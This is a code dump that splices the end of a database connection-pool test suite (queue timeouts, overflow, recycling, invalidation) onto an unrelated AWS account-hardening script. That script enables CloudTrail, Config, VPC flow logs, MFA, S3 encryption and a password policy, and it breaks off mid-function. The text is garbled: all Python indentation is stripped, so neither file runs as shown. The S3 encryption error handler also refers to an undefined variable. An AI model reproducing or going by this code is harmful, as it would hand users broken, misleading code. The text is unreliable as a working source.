c1 = p.connect()
c2 = p.connect()
self.assert_(status(p) == (3, 1, 0, 2), status(p))
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
self.assert_(status(p) == (3, 2, 0, 1))
c1.close()
lazy_gc()
assert not pool._refs
def test_timeout(self):
p = self._queuepool_fixture(pool_size=3,
max_overflow=0,
timeout=2)
c1 = p.connect()
c2 = p.connect()
c3 = p.connect()
now = time.time()
try:
c4 = p.connect()
assert False
except tsa.exc.TimeoutError:
assert int(time.time() - now) == 2
@testing.requires.threading_with_mock
def test_timeout_race(self):
# test a race condition where the initial connecting threads all race
# to queue.Empty, then block on the mutex. each thread consumes a
# connection as they go in. when the limit is reached, the remaining
# threads go in, and get TimeoutError; even though they never got to
# wait for the timeout on queue.get(). the fix involves checking the
# timeout again within the mutex, and if so, unlocking and throwing
# them back to the start of do_get()
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=lambda: dbapi.connect(delay=.05),
pool_size=2,
max_overflow=1, use_threadlocal=False, timeout=3)
timeouts = []
def checkout():
for x in range(1):
now = time.time()
try:
c1 = p.connect()
except tsa.exc.TimeoutError:
timeouts.append(time.time() - now)
continue
time.sleep(4)
c1.close()
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
assert len(timeouts) > 0
for t in timeouts:
assert t >= 3, "Not all timeouts were >= 3 seconds %r" % timeouts
            # normally, the timeout should be under 4 seconds,
# but on a loaded down buildbot it can go up.
assert t < 14, "Not all timeouts were < 14 seconds %r" % timeouts
def _test_overflow(self, thread_count, max_overflow):
gc_collect()
dbapi = MockDBAPI()
def creator():
time.sleep(.05)
return dbapi.connect()
p = pool.QueuePool(creator=creator,
pool_size=3, timeout=2,
max_overflow=max_overflow)
peaks = []
def whammy():
for i in range(10):
try:
con = p.connect()
time.sleep(.005)
peaks.append(p.overflow())
con.close()
del con
except tsa.exc.TimeoutError:
pass
threads = []
for i in range(thread_count):
th = threading.Thread(target=whammy)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
self.assert_(max(peaks) <= max_overflow)
lazy_gc()
assert not pool._refs
def test_overflow_reset_on_failed_connect(self):
dbapi = Mock()
def failing_dbapi():
time.sleep(2)
raise Exception("connection failed")
creator = dbapi.connect
def create():
return creator()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
c1 = p.connect()
c2 = p.connect()
c3 = p.connect()
eq_(p._overflow, 1)
creator = failing_dbapi
assert_raises(Exception, p.connect)
eq_(p._overflow, 1)
@testing.requires.threading_with_mock
def test_hanging_connect_within_overflow(self):
"""test that a single connect() call which is hanging
does not block other connections from proceeding."""
dbapi = Mock()
mutex = threading.Lock()
def hanging_dbapi():
time.sleep(2)
with mutex:
return dbapi.connect()
def fast_dbapi():
with mutex:
return dbapi.connect()
creator = threading.local()
def create():
return creator.mock_connector()
def run_test(name, pool, should_hang):
if should_hang:
creator.mock_connector = hanging_dbapi
else:
creator.mock_connector = fast_dbapi
conn = pool.connect()
conn.operation(name)
time.sleep(1)
conn.close()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
threads = [
threading.Thread(
target=run_test, args=("success_one", p, False)),
threading.Thread(
target=run_test, args=("success_two", p, False)),
threading.Thread(
target=run_test, args=("overflow_one", p, True)),
threading.Thread(
target=run_test, args=("overflow_two", p, False)),
threading.Thread(
target=run_test, args=("overflow_three", p, False))
]
for t in threads:
t.start()
time.sleep(.2)
for t in threads:
t.join(timeout=join_timeout)
eq_(
dbapi.connect().operation.mock_calls,
[call("success_one"), call("success_two"),
call("overflow_two"), call("overflow_three"),
call("overflow_one")]
)
@testing.requires.threading_with_mock
def test_waiters_handled(self):
"""test that threads waiting for connections are
handled when the pool is replaced.
"""
mutex = threading.Lock()
dbapi = MockDBAPI()
def creator():
mutex.acquire()
try:
return dbapi.connect()
finally:
mutex.release()
success = []
for timeout in (None, 30):
for max_overflow in (0, -1, 3):
p = pool.QueuePool(creator=creator,
pool_size=2, timeout=timeout,
max_overflow=max_overflow)
def waiter(p, timeout, max_overflow):
success_key = (timeout, max_overflow)
conn = p.connect()
success.append(success_key)
time.sleep(.1)
conn.close()
c1 = p.connect()
c2 = p.connect()
threads = []
for i in range(2):
t = threading.Thread(target=waiter,
args=(p, timeout, max_overflow))
t.daemon = True
t.start()
threads.append(t)
# this sleep makes sure that the
# two waiter threads hit upon wait()
# inside the queue, before we invalidate the other
# two conns
time.sleep(.2)
p2 = p._replace()
for t in threads:
t.join(join_timeout)
eq_(len(success), 12, "successes: %s" % success)
@testing.requires.threading_with_mock
def test_notify_waiters(self):
dbapi = MockDBAPI()
canary = []
def creator1():
canary.append(1)
return dbapi.connect()
def creator2():
canary.append(2)
return dbapi.connect()
p1 = pool.QueuePool(creator=creator1,
pool_size=1, timeout=None,
max_overflow=0)
p2 = pool.NullPool(creator=creator2)
def waiter(p):
conn = p.connect()
time.sleep(.5)
conn.close()
c1 = p1.connect()
threads = []
for i in range(5):
t = threading.Thread(target=waiter, args=(p1, ))
t.start()
threads.append(t)
time.sleep(.5)
eq_(canary, [1])
p1._pool.abort(p2)
for t in threads:
t.join(join_timeout)
eq_(canary, [1, 2, 2, 2, 2, 2])
def test_dispose_closes_pooled(self):
dbapi = MockDBAPI()
p = pool.QueuePool(creator=dbapi.connect,
pool_size=2, timeout=None,
max_overflow=0)
c1 = p.connect()
c2 = p.connect()
c1_con = c1.connection
c2_con = c2.connection
c1.close()
eq_(c1_con.close.call_count, 0)
eq_(c2_con.close.call_count, 0)
p.dispose()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# currently, if a ConnectionFairy is closed
# after the pool has been disposed, there's no
# flag that states it should be invalidated
# immediately - it just gets returned to the
# pool normally...
c2.close()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# ...and that's the one we'll get back next.
c3 = p.connect()
assert c3.connection is c2_con
@testing.requires.threading_with_mock
def test_no_overflow(self):
self._test_overflow(40, 0)
@testing.requires.threading_with_mock
def test_max_overflow(self):
self._test_overflow(40, 5)
def test_mixed_close(self):
pool._refs.clear()
p = self._queuepool_fixture(pool_size=3, max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
assert c1 is c2
c1.close()
c2 = None
assert p.checkedout() == 1
c1 = None
lazy_gc()
assert p.checkedout() == 0
lazy_gc()
assert not pool._refs
def test_overflow_no_gc_tlocal(self):
self._test_overflow_no_gc(True)
def test_overflow_no_gc(self):
self._test_overflow_no_gc(False)
def _test_overflow_no_gc(self, threadlocal):
p = self._queuepool_fixture(pool_size=2,
max_overflow=2)
# disable weakref collection of the
# underlying connections
strong_refs = set()
def _conn():
c = p.connect()
strong_refs.add(c.connection)
return c
for j in range(5):
# open 4 conns at a time. each time this
# will yield two pooled connections + two
# overflow connections.
conns = [_conn() for i in range(4)]
for c in conns:
c.close()
# doing that for a total of 5 times yields
# ten overflow connections closed plus the
# two pooled connections unclosed.
eq_(
set([c.close.call_count for c in strong_refs]),
            set([1, 0])
)
@testing.requires.predictable_gc
def test_weakref_kaboom(self):
p = self._queuepool_fixture(pool_size=3,
max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
c1.close()
c2 = None
del c1
del c2
gc_collect()
assert p.checkedout() == 0
c3 = p.connect()
assert c3 is not None
def test_trick_the_counter(self):
"""this is a "flaw" in the connection pool; since threadlocal
uses a single ConnectionFairy per thread with an open/close
counter, you can fool the counter into giving you a
        ConnectionFairy with an ambiguous counter, i.e. it's not true
reference counting."""
p = self._queuepool_fixture(pool_size=3,
max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c2 = p.connect()
assert c1 is c2
c1.close()
c2 = p.connect()
c2.close()
self.assert_(p.checkedout() != 0)
c2.close()
self.assert_(p.checkedout() == 0)
def test_recycle(self):
p = self._queuepool_fixture(pool_size=1,
max_overflow=0,
recycle=3)
c1 = p.connect()
c_id = id(c1.connection)
c1.close()
c2 = p.connect()
assert id(c2.connection) == c_id
c2.close()
time.sleep(4)
c3 = p.connect()
assert id(c3.connection) != c_id
def _assert_cleanup_on_pooled_reconnect(self, dbapi, p):
# p is QueuePool with size=1, max_overflow=2,
# and one connection in the pool that will need to
# reconnect when next used (either due to recycle or invalidate)
eq_(p.checkedout(), 0)
eq_(p._overflow, 0)
dbapi.shutdown(True)
assert_raises(
Exception,
p.connect
)
eq_(p._overflow, 0)
eq_(p.checkedout(), 0) # and not 1
dbapi.shutdown(False)
c1 = p.connect()
assert p._pool.empty() # poolsize is one, so we're empty OK
c2 = p.connect()
eq_(p._overflow, 1) # and not 2
# this hangs if p._overflow is 2
c3 = p.connect()
def test_error_on_pooled_reconnect_cleanup_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2)
c1 = p.connect()
c1.invalidate()
c1.close()
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
def test_error_on_pooled_reconnect_cleanup_recycle(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1,
max_overflow=2, recycle=1)
c1 = p.connect()
c1.close()
time.sleep(1)
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
def test_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_recreate(self):
p = self._queuepool_fixture(reset_on_return=None, pool_size=1, max_overflow=0)
p2 = p.recreate()
assert p2.size() == 1
assert p2._reset_on_return is pool.reset_none
assert p2._use_threadlocal is False
assert p2._max_overflow == 0
def test_reconnect(self):
"""tests reconnect operations at the pool level. SA's
engine/dialect includes another layer of reconnect support for
'database was lost' errors."""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
dbapi.raise_error = True
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_detach(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1.detach()
c2 = p.connect()
eq_(dbapi.connect.mock_calls, [call("foo.db"), call("foo.db")])
c1_con = c1.connection
assert c1_con is not None
eq_(c1_con.close.call_count, 0)
c1.close()
eq_(c1_con.close.call_count, 1)
def test_detach_via_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1_con = c1.connection
c1.invalidate()
assert c1.connection is None
eq_(c1_con.close.call_count, 1)
c2 = p.connect()
assert c2.connection is not c1_con
c2_con = c2.connection
c2.close()
eq_(c2_con.close.call_count, 0)
def test_threadfairy(self):
p = self._queuepool_fixture(pool_size=3, max_overflow=-1, use_threadlocal=True)
c1 = p.connect()
c1.close()
c2 = p.connect()
assert c2.connection is not None
class SingletonThreadPoolTest(PoolTestBase):
@testing.requires.threading_with_mock
def test_cleanup(self):
self._test_cleanup(False)
@testing.requires.threading_with_mock
def test_cleanup_no_gc(self):
self._test_cleanup(True)
def _test_cleanup(self, strong_refs):
"""test that the pool's connections are OK after cleanup() has
been called."""
dbapi = MockDBAPI()
lock = threading.Lock()
def creator():
# the mock iterator isn't threadsafe...
with lock:
return dbapi.connect()
p = pool.SingletonThreadPool(creator=creator, pool_size=3)
if strong_refs:
sr = set()
def _conn():
c = p.connect()
sr.add(c.connection)
return c
else:
def _conn():
return p.connect()
def checkout():
for x in range(10):
c = _conn()
assert c
c.cursor()
c.close()
time.sleep(.1)
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
assert len(p._all_conns) == 3
if strong_refs:
still_opened = len([c for c in sr if not c.close.call_count])
eq_(still_opened, 3)
class AssertionPoolTest(PoolTestBase):
def test_connect_error(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect('foo.db'))
c1 = p.connect()
assert_raises(AssertionError, p.connect)
def test_connect_multiple(self):
dbapi = MockDBAPI()
p = pool.AssertionPool(creator=lambda: dbapi.connect('foo.db'))
c1 = p.connect()
c1.close()
c2 = p.connect()
c2.close()
c3 = p.connect()
assert_raises(AssertionError, p.connect)
class NullPoolTest(PoolTestBase):
def test_reconnect(self):
dbapi = MockDBAPI()
p = pool.NullPool(creator=lambda: dbapi.connect('foo.db'))
c1 = p.connect()
c1.close()
c1 = None
c1 = p.connect()
c1.invalidate()
c1 = None
c1 = p.connect()
dbapi.connect.assert_has_calls([
call('foo.db'),
call('foo.db')],
any_order=True)
class StaticPoolTest(PoolTestBase):
def test_recreate(self):
dbapi = MockDBAPI()
creator = lambda: dbapi.connect('foo.db')
p = pool.StaticPool(creator)
p2 = p.recreate()
assert p._creator is p2._creator
|
setupaws.py
|
import random
import json
import time
import sys
import threading
from pathlib import Path
from PIL import Image
from botocore.exceptions import ClientError
from secureaws import common
def secure_account_menu(session):
"""
This will enable basic security services on your AWS account
"""
try:
while True:
print("\nSecure Account Menu:")
print("====================")
print("q: Quit")
print("?: Help")
print("*: Enable All")
print("1: Enable CloudTrail")
print("2: Enable Config")
print("3: Enable FlowLogs")
print("4: Enable Root MFA")
print("5: Enable S3 SSE")
print("6: Setup Password Policy")
print("7: Enable EBS SSE\n")
choice = str.lower(str.strip(input("Choice: ")))
if choice == "q":
break
elif choice == "?":
print("=============== HELP ===============")
print("- To set up individual service simply provide the number referring to the service and hit return key.")
print("- To set up multiple services simply provide comma(,) seperated numbers referring to the service and hit return key. Example: 2,5,1,3")
print("- To set up all services provide * and hit return key.")
elif choice == "*":
secure_account(session, non_interactive=False)
elif len(choice.split(",")) > 0:
choices = choice.split(",")
choices.sort()
                # drop blank or non-numeric entries (note: str.isnumeric is a method and must be called)
                choices = [ch for ch in choices if str(ch).strip() != "" and str(ch).strip().isnumeric()]
for ch in choices:
if ch == "1":
enable_cloudtrail(session, non_interactive=False)
elif ch == "2":
enable_config(session, non_interactive=False)
elif ch == "3":
enable_flowlogs(session, non_interactive=False)
elif ch == "4":
setup_virtual_mfa(session, non_interactive=False)
elif ch == "5":
enable_s3_sse(session, non_interactive=False)
elif ch == "6":
setup_custom_password_policy(session, non_interactive=False)
elif ch == "7":
enable_ebs_sse(session, non_interactive=False)
elif ch == "q" or ch == "?" or ch == "*":
continue
else:
print("Invalid Choice.")
elif choice == "1":
enable_cloudtrail(session, non_interactive=False)
elif choice == "2":
enable_config(session, non_interactive=False)
elif choice == "3":
enable_flowlogs(session, non_interactive=False)
elif choice == "4":
setup_virtual_mfa(session, non_interactive=False)
elif choice == "5":
enable_s3_sse(session, non_interactive=False)
elif choice == "6":
setup_custom_password_policy(session, non_interactive=False)
elif choice == "7":
enable_ebs_sse(session, non_interactive=False)
else:
print("Invalid choice.")
except ClientError as e:
print("Fail. Reason: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
def secure_account(session, svc=None, buckets=None, instance_id=None, volume_id=None, kms_id=None, non_interactive=False):
if svc == None or len(svc) == 0:
enable_cloudtrail(session, non_interactive)
enable_config(session, non_interactive)
enable_flowlogs(session, non_interactive)
setup_virtual_mfa(session, non_interactive)
enable_s3_sse(session, non_interactive, buckets, kms_id)
setup_custom_password_policy(session, non_interactive)
if not non_interactive:
enable_ebs_sse(session, non_interactive, instance_id, volume_id, kms_id)
else:
for s in svc:
if s == "cloudtrail":
enable_cloudtrail(session, non_interactive)
elif s == "config":
enable_config(session, non_interactive)
elif s == "flowlogs":
enable_flowlogs(session, non_interactive)
elif s == "mfa" or "mfa=" in s:
uname = "root" if "=" not in s else s.split("=")[1]
setup_virtual_mfa(session, non_interactive, uname)
elif s == "s3-sse":
enable_s3_sse(session, non_interactive, buckets, kms_id)
elif s == "ebs-sse":
                    if non_interactive and not instance_id and not volume_id:
                        print("Either --instance-id or --volume-id is required for EBS encryption")
return False
enable_ebs_sse(session, non_interactive, instance_id, volume_id, kms_id)
elif s == "password-policy":
setup_custom_password_policy(session, non_interactive)
def enable_cloudtrail(session, non_interactive):
"""
This will create a new S3 bucket and enable CloudTrail service for all regions along with recording global events
"""
opt = ""
bname = ""
try:
print("\n====================================")
print("Setting up CloudTrail")
print("====================================")
if not non_interactive:
print("Following additional resource will be created:")
print("> S3 Bucket - To store audit logs")
opt = str.lower(str.strip(input("\nDo you want to continue(Y/n): ")))
else:
opt = "y"
bname = "cloudtrail-all-regions-{}".format(common.random_string(5))
if opt == "y" or opt == "":
# Fetching Account ID for S3 Policy and Starting CloudTrail log
accountId = common.get_account_id()
bname = str.lower(str.strip(input("Bucket Name: "))) if bname == "" else bname
# Checking if bucket already exists
sys.stdout.write("Checking if bucket exists... ")
sys.stdout.flush()
s3 = session.client('s3')
if common.check_bucket_exists(bname):
print("True")
else:
print("False")
sys.stdout.write("Creating bucket... ")
sys.stdout.flush()
cbresp = common.create_s3_bucket(bname, session.region_name)
if cbresp == True:
print("Ok ({})".format(bname))
else:
print(cbresp)
return False
# Updating bucket policy
sys.stdout.write("Assigning permission to bucket... ")
sys.stdout.flush()
try:
bpolicy = {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AWSCloudTrailAclCheck",
"Effect": "Allow",
"Principal": {
"Service": "cloudtrail.amazonaws.com"
},
"Action": "s3:GetBucketAcl",
"Resource": "arn:aws:s3:::{}".format(bname)
},
{
"Sid": "AWSCloudTrailWrite",
"Effect": "Allow",
"Principal": {
"Service": "cloudtrail.amazonaws.com"
},
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::{}/AWSLogs/{}/*".format(bname, accountId),
"Condition": {
"StringEquals": {
"s3:x-amz-acl": "bucket-owner-full-control"
}
}
}
]
}
time.sleep(1)
s3.put_bucket_policy(
Bucket=bname,
Policy=json.dumps(bpolicy)
)
print("Ok")
except ClientError as err:
print("Error: " + err.response['Error']['Code'] + " - " + err.response['Error']['Message'])
return False
# Setting up CloudTrail
try:
sys.stdout.write("Setting up CloudTrail... ")
sys.stdout.flush()
trail = session.client('cloudtrail')
trailName = "all-regions-trail-{}".format(common.random_string(5))
tresp = trail.create_trail(
Name=trailName,
S3BucketName=bname,
IncludeGlobalServiceEvents=True,
IsMultiRegionTrail=True,
EnableLogFileValidation=True
)
tresp = trail.start_logging(
Name="arn:aws:cloudtrail:{}:{}:trail/{}".format(session.region_name, accountId, trailName)
)
print("Ok ({})".format(trailName))
return True
except ClientError as err:
print("Error: " + err.response['Error']['Code'] + " - " + err.response['Error']['Message'])
return False
else:
print("Skipping CloudTrail setup.")
return False
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def enable_config(session, non_interactive):
"""
This will create a new S3 bucket and enable Config service for specific region
"""
opt = ""
bname = ""
try:
print("\n====================================")
print("Setting up Config")
print("====================================")
if not non_interactive:
print("Following additional resource will be created:")
print("> S3 Bucket - To store configuration snapshots")
opt = str.lower(str.strip(input("\nDo you want to continue(Y/n): ")))
else:
opt = "y"
bname = "config-{}-{}".format(session.region_name, common.random_string(5))
if opt == "" or opt == "y":
# Fetching Account ID for S3 Policy and Starting CloudTrail log
accountId = common.get_account_id()
bname = str.lower(str.strip(input("Bucket Name: "))) if bname == "" else bname
# Checking if bucket exists
sys.stdout.write("Checking if bucket exists... ")
sys.stdout.flush()
s3 = session.client('s3')
if common.check_bucket_exists(bname):
print("True")
else:
print("False")
sys.stdout.write("Creating bucket... ")
sys.stdout.flush()
cbresp = common.create_s3_bucket(bname, session.region_name)
if cbresp == True:
print("Ok ({})".format(bname))
else:
print(cbresp)
return False
# Updating bucket policy
sys.stdout.write("Assigning permission to bucket... ")
sys.stdout.flush()
try:
bpolicy = {
"Version": "2012-10-17",
"Statement": [
{
"Sid": "AWSConfigBucketPermissionsCheck",
"Effect": "Allow",
"Principal": {
"Service": "config.amazonaws.com"
},
"Action": "s3:GetBucketAcl",
"Resource": "arn:aws:s3:::{}".format(bname)
},
{
"Sid": "AWSConfigBucketDelivery",
"Effect": "Allow",
"Principal": {
"Service": "config.amazonaws.com"
},
"Action": "s3:PutObject",
"Resource": "arn:aws:s3:::{}/AWSLogs/{}/Config/*".format(bname, accountId),
"Condition": {
"StringEquals": {
"s3:x-amz-acl": "bucket-owner-full-control"
}
}
}
]
}
time.sleep(1)
s3.put_bucket_policy(
Bucket=bname,
Policy=json.dumps(bpolicy)
)
print("Ok")
except ClientError as err:
print("Error: " + err.response['Error']['Code'] + " - " + err.response['Error']['Message'])
return False
# Setting up Config
try:
sys.stdout.write("Setting up Config... ")
sys.stdout.flush()
config = session.client('config')
recorder_name = 'config-{}-recorder-{}'.format(session.region_name, common.random_string(5))
cresp = config.put_configuration_recorder(
ConfigurationRecorder={
'name': recorder_name,
'roleARN': "arn:aws:iam::{}:role/aws-service-role/config.amazonaws.com/AWSServiceRoleForConfig".format(accountId),
'recordingGroup': {
'allSupported': True,
'includeGlobalResourceTypes': True
}
}
)
cresp = config.put_delivery_channel(
DeliveryChannel={
'name': 'config-{}-channel-{}'.format(session.region_name, common.random_string(5)),
's3BucketName': bname
}
)
cresp = config.start_configuration_recorder(
ConfigurationRecorderName=recorder_name
)
print("Ok ({})".format(recorder_name))
return True
except ClientError as err:
print("Error: " + err.response['Error']['Code'] + " - " + err.response['Error']['Message'])
return False
else:
print("Skipping cofig setup")
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def add_config_rules(session, non_interactive): # COMING SOON...
"""
access-key-rotated
acm-certificate-expiration-check
alb-http-to-https-redirection-check
elb-loggin-enabled
cloud-trail-log-file-validation-enabled
cloudtrail-enabled
encrypted-volumes
root-account-mfa-enabled
vpc-flow-logs-enabled
s3-bucket-server-side-encryption-enabled
"""
try:
return True
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def enable_flowlogs(session, non_interactive):
"""
This will enable flow logs on all existing VPCs
"""
opt = ""
try:
print("\n====================================")
print("Setting up FlowLogs")
print("====================================")
if not non_interactive:
print("Following additional resources will be created:")
print("> IAM Role - Permission for VPC to put logs in CloudWatch")
print("> CloudWatch Log Group - To store VPC Flow Logs")
opt = str.lower(str.strip(input("\nDo you want to continue(Y/n): ")))
else:
opt = "y"
if opt == "y" or opt == "":
# Creating IAM Role
sys.stdout.write("Creating IAM Role... ")
sys.stdout.flush()
iam = session.client('iam')
trust_policy = {
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "vpc-flow-logs.amazonaws.com"
},
"Action": "sts:AssumeRole"
}
]
}
roleName = "vpc-flow-logs-role-{}".format(common.random_string(5))
iresp = iam.create_role(
RoleName=roleName,
AssumeRolePolicyDocument=json.dumps(trust_policy)
)
role_arn = iresp['Role']['Arn']
permission_policy = {
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"logs:CreateLogGroup",
"logs:CreateLogStream",
"logs:DescribeLogGroups",
"logs:DescribeLogStreams",
"logs:PutLogEvents"
],
"Effect": "Allow",
"Resource": "*"
}
]
}
iresp = iam.create_policy(
PolicyName="vpc-flow-logs-policy-{}".format(common.random_string(5)),
PolicyDocument=json.dumps(permission_policy)
)
iam.attach_role_policy(
RoleName=roleName,
PolicyArn=iresp['Policy']['Arn']
)
print("Ok ({})".format(roleName))
# Setting up flow logs for all VPCs
ec2 = session.client('ec2')
vresp = ec2.describe_vpcs()
for vpc in vresp['Vpcs']:
vpc_id = vpc['VpcId']
vpc_name = common.get_name_tag(vpc['Tags']) if 'Tags' in vpc else None
if vpc_name == None:
vpc_name = vpc_id
log_group_name = "{}-flow-log-group-{}".format(vpc_name, common.random_string(5))
# Creating CloudWatch Log Group
sys.stdout.write("Creating CloudWatch Log Group... ")
sys.stdout.flush()
logs = session.client('logs')
logs.create_log_group(
logGroupName=log_group_name
)
lresp = logs.describe_log_groups(
logGroupNamePrefix=log_group_name,
limit=1
)
log_group_arn = lresp['logGroups'][0]['arn']
print("Ok ({})".format(log_group_name))
# Starting Flow Logs
sys.stdout.write("Starting Flow Logs... ")
sys.stdout.flush()
ec2 = session.client('ec2')
eresp = ec2.create_flow_logs(
DeliverLogsPermissionArn=role_arn,
LogGroupName=log_group_name,
ResourceIds=[
vpc_id,
],
ResourceType='VPC',
TrafficType='ALL',
LogDestinationType='cloud-watch-logs'
)
if len(eresp['Unsuccessful']) > 0:
print("Fail. Reason:" + eresp['Unsuccessful'][0]['Error']['Code'])
return False
print("Ok ({})".format(eresp['FlowLogIds'][0]))
return True
else:
print("Skipping flowlog setup")
return False
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def setup_virtual_mfa(session, non_interactive, username="root"):
"""
This will setup MFA on root account by default
"""
opt = ""
try:
print("\n====================================")
print("Setting up MFA")
print("====================================")
if not non_interactive:
uname = str.lower(str.strip(input("Username ({}): ".format(username))))
username = uname if not str.strip(uname) == "" else username
print("\nThis will enable MFA on {} user.".format(username))
opt = str.lower(str.strip(input("Do you want to continue(Y/n): ")))
else:
opt = "y"
if opt == "y" or opt == "":
if username != "root":
# Checking if user exists
iam = session.client('iam')
sys.stdout.write("Checking if user exists... ")
sys.stdout.flush()
try:
uresp = iam.get_user(
UserName=username
)
print("Ok")
except ClientError as err:
if err.response['Error']['Code'] == "NoSuchEntity":
print("False")
else:
print("Error: " + err.response['Error']['Code'] + " - " + err.response['Error']['Message'])
return False
# Checking if MFA is already enabled for user
iam = session.client('iam')
sys.stdout.write("Checking if MFA already enabled... ")
sys.stdout.flush()
try:
uresp = iam.list_mfa_devices(
UserName=username
)
if len(uresp['MFADevices']) > 0:
print("True")
return False
print("False")
except ClientError as err:
print("Error: " + err.response['Error']['Code'] + " - " + err.response['Error']['Message'])
return False
# Creating virtual mfa device
sys.stdout.write("Creating virtual MFA device... ")
sys.stdout.flush()
rand_num = random.randint(1000, 9999)
mfa_name = username
user_path = "/" if username == "root" else "/user/" + username + "/"
mresp = iam.create_virtual_mfa_device(
Path=user_path,
VirtualMFADeviceName='{}-mfa-device-{}'.format(mfa_name, rand_num)
)
mfa_serial = mresp['VirtualMFADevice']['SerialNumber']
png_path = str(Path.home()) + "/{}-mfa-qr-{}.png".format(mfa_name, rand_num)
secret = ""
try:
secret = str(mresp['VirtualMFADevice']['Base32StringSeed'], 'utf-8')
with open(png_path, "wb") as f:
f.write(mresp['VirtualMFADevice']['QRCodePNG'])
img = Image.open(png_path)
img.show()
            except IOError as ioerr:
                print("Error: could not save or display the MFA QR code ({})".format(ioerr))
                return False
print("Ok")
print("==========================================")
print("Secret: " + secret)
print("==========================================")
print("Open Google Authenticator app on your mobile/tab and scan the QR code or use the secret displayed above to setup MFA for {} user.".format(mfa_name))
print("Please wait for the code to refresh after first input.")
for index in range(2): # Allowing 2 attempts
mfa1 = input("Auth Code 1: ")
mfa2 = input("Auth Code 2: ")
try:
maresp = iam.enable_mfa_device(
UserName=mfa_name,
SerialNumber=mfa_serial,
AuthenticationCode1=mfa1,
AuthenticationCode2=mfa2
)
break
except ClientError as err:
print("Error: " + err.response['Error']['Code'] + " - " + err.response['Error']['Message'])
if index == 1:
print("You have exhausted the limit. Please start the setup again.")
return False
print("This is your last try.\n")
print("Virtual MFA has been enabled for {} user.".format(mfa_name))
return True
else:
print("Skipping MFA setup")
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def enable_s3_sse(session, non_interactive, buckets=None, kms_id=None):
"""
This will enable server-side encryption on all your S3 buckets
"""
opt = ""
try:
if not non_interactive:
print("\n====================================")
print("Setting up S3 SSE")
print("====================================")
print("This will enable SSE on all S3 buckets.")
opt = str.lower(str.strip(input("\nDo you want to continue(Y/n): ")))
else:
opt = "y"
if opt == "y" or opt == "":
s3 = session.client('s3')
if buckets == None or len(buckets) == 0:
resp = s3.list_buckets()
bucket_list = resp['Buckets']
else:
bucket_list = []
for b in list(buckets):
tmp = {
'Name': b
}
bucket_list.append(tmp)
for bucket in bucket_list:
bname = bucket['Name']
try:
sys.stdout.write("{}... ".format(bname))
sys.stdout.flush()
args = {
'Bucket': bname,
'ServerSideEncryptionConfiguration': {
'Rules': []
}
}
if kms_id == None or len(kms_id) == 0:
args['ServerSideEncryptionConfiguration']['Rules'].append({
'ApplyServerSideEncryptionByDefault': {
'SSEAlgorithm': 'AES256'
}
})
else:
args['ServerSideEncryptionConfiguration']['Rules'].append({
'ApplyServerSideEncryptionByDefault': {
'SSEAlgorithm': 'aws:kms',
'KMSMasterKeyID': common.prepare_kms_key(session, kms_id)
}
})
r = s3.put_bucket_encryption(**args)
print("Enabled")
except ClientError as err:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
else:
print("Skipping SSE setup on S3 buckets")
except ClientError as e:
print("Error: " + e.response['Error']['Code'] + " - " + e.response['Error']['Message'])
return False
except Exception as ex:
print("Error: {}".format(ex))
return False
def setup_custom_password_policy(session, non_interactive, pass_length=10, rq_num=True, rq_upper=True, rq_lower=True, rq_symbol=True, pass_history=3, pass_age=90):
"""
This will setup a strong password policy
"""
opt = ""
try:
print("\n====================================")
print("Setting up Password Policy")
print("====================================")
print("Following policy will be created:")
print("> Minimum Password Length: {}".format(pass_length))
print("> Require Numbers : {}".format(rq_num))
print("> Require Symbols : {}".format(rq_symbol))
print("> Require Uppercase : {}".format(rq_upper))
